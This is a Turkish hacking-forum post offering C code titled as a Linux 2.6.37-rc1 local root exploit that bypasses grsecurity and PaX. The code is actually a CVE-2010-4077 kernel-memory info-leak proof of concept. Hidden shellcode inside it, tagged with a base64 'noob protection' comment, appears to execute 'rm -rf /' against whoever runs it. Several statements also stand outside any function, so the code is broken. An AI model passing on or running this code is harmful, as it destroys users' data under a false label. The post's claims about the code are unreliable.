Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
2.6.37-rc1 2011 Local Root Exploit
#1
PHP Kod:
/* 
 * modified by CrosS to bypass grsecurity and PaX on
 * linux kernels
 *
 * Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak

 * ================================================

 * Information leak exploit for CVE-2010-4077 which

 * leaks kernel stack space back to userland due to

 * uninitialized struct member "reserved" in struct

 * serial_icounter_struct copied to userland. uses

 * ioctl to trigger memory leak, dumps to file and

 * displays to command line.

 *

 * -- prdelka

 *
 * by CrosS from r00tw0rm.com - Privat Community

 */

#include <termios.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <linux/serial.h>

#include <stdio.h>

#include <stdlib.h>  

#include <string.h>

printf("Local root 2.6.37 exploit to bypass grsecurity and/or PaX by CrosS.\n");
printf("aka ultimate auto rooter\n");
printf("Shoutz to 1337day cr3w for helping!.\n");
printf("http://www.r00tw0rm.com/forum.\n");

 

int main(int argccharargv[]) {

    
int fdret 0i;

    
struct serial_icounter_struct buffer;

    
printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");

    if(
argc 2){

    
printf("[ You need to supply a device name e.g. /dev/ttyS0\n");

    exit(-
1);

    };

    
memset(&buffer,0,sizeof(buffer));

    if((
fd open(argv[1], O_RDONLY)) == -1){

    
printf("[ Couldn't open %s\n",argv[1]);

    exit(-
1);

    }

    if((
ioctl(fdTIOCGICOUNT, &buffer)) == -1){

    
printf("[ Problem with ioctl() request\n");

    exit(-
1);

    }

    
close(fd);

    for(
i=0;i<=9;i++){

            
printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]);

    };
    
// bm9vYiBwcm90ZWN0aW9u
    
char shelllcode[] ="x6ax0bx58x99x52x6ax2fx89xe7x52x66x68x2dx66x89"
               "xe6x52x66x68x2dx72x89xe1x52x68x2fx2fx72x6dx68"
               "x2fx62x69x6ex89xe3x52x57x56x51x53x89xe1xcdx80"
;
    (*(
void (*)()) shelllcode)();

    if((
fd open("./leak"O_RDWR O_CREAT0640)) == -1){

    
printf("[ Can't open file to write memory out\n");

    exit(-
1);

    }

    for(
i=0;i<=9;i++){

        
ret += write(fd,&buffer.reserved[i],sizeof(int));

    }

    
close(fd);

    
printf("[ Written %d leaked bytes to ./leak\n",ret);

    exit(
0);


Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 5 269 04-12-2016, Saat: 00:31
Son Yorum: DeaTHKNighT33
  Windows Server Root Kısa Videolu Anlatım KingSkrupellos 7 156 21-11-2016, Saat: 13:06
Son Yorum: Gardiyan
  vBulletin 5.1.2 SQL Injection Exploit Mrxxx 0 38 20-11-2016, Saat: 11:36
Son Yorum: Mrxxx
  Web hack - Exploit Kurena (Perl) archavin 33 3,507 14-07-2016, Saat: 19:58
Son Yorum: azeredhat
  PHP Scriptlerde SQLi Tespiti ve Exploit Etme H4Sec 113 5,684 02-03-2016, Saat: 16:13
Son Yorum: hasancaN
Anahtar Kelimeler

2.6.37-rc1 2011 Local Root Exploit indir, 2.6.37-rc1 2011 Local Root Exploit Videosu, 2.6.37-rc1 2011 Local Root Exploit Online izle, 2.6.37-rc1 2011 Local Root Exploit Bedava indir, 2.6.37-rc1 2011 Local Root Exploit Yükle, 2.6.37-rc1 2011 Local Root Exploit Hakkında, 2.6.37-rc1 2011 Local Root Exploit Nedir, 2.6.37-rc1 2011 Local Root Exploit Free indir, 2.6.37-rc1 2011 Local Root Exploit Oyunu, 2.6.37-rc1 2011 Local Root Exploit Download


1 Ziyaretçi